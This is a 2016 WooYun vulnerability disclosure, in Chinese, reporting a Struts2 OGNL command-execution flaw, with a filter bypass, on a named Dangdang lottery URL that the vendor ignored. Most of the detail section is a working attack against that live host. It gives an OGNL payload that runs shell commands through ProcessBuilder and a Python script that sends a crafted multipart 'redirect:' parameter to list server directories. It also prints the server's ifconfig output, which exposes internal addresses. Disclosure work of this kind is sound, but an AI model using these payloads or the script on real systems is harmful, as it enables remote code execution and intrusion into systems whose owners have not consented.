当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0227945

漏洞标题:神器而已之当当某站Struts2命令执行漏洞(绕过过滤)

相关厂商:当当网

漏洞作者: 路人甲

提交时间:2016-07-11 13:13

修复时间:2016-07-16 18:30

公开时间:2016-07-16 18:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-07-11: 细节已通知厂商并且等待厂商处理中
2016-07-11: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

神器在手,天下我有。

详细说明:

从TangScan提交插件赚取汤圆购买了另一个插件,扫到当当一个站点的Struts2命令执行:

1.png


漏洞地址:http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm
此处应有防护或过滤,之前的Payload都不好使了。
测试Payload:

2.png


3.png


列目录:

4.png


5.png


执行命令:

6.png


7.png


ifconfig的结果解码后:

eth0      Link encap:Ethernet  HWaddr 90:B1:1C:4C:A9:F2  
inet addr:192.168.1.203 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::92b1:1cff:fe4c:a9f2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3425084210 errors:0 dropped:15 overruns:0 frame:4604
TX packets:2920393573 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2642679068898 (2.4 TiB) TX bytes:1537753012738 (1.3 TiB)
Interrupt:194 Memory:d91a0000-d91b0000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:910780964 errors:0 dropped:0 overruns:0 frame:0
TX packets:910780964 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:484110986527 (450.8 GiB) TX bytes:484110986527 (450.8 GiB)
virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:26 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:4022 (3.9 KiB)


证实漏洞存在,不再深入,执行命令的Payload附在下面:

${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}


列目录脚本:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import re
import base64
import requests

path = '/usr/local/bea/'#要读取的路径
url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"#漏洞URL
data = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""
try:
headers = {
'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc',
'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9'
}
for x in range(0, 400):
response = requests.post(url, data = data % (path, str(x)), headers=headers, timeout=5, verify=False, allow_redirects=False)
result = re.findall(r'~\[(.*?)\]~', response.content, re.S|re.I)
if len(result) !=0:
print(result[0])
else:
print("Result End.....")
break
except Exception, e:
print(str(e))


漏洞证明:

列目录:

4.png


5.png


执行命令:

6.png


7.png


8.png

修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-07-16 18:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无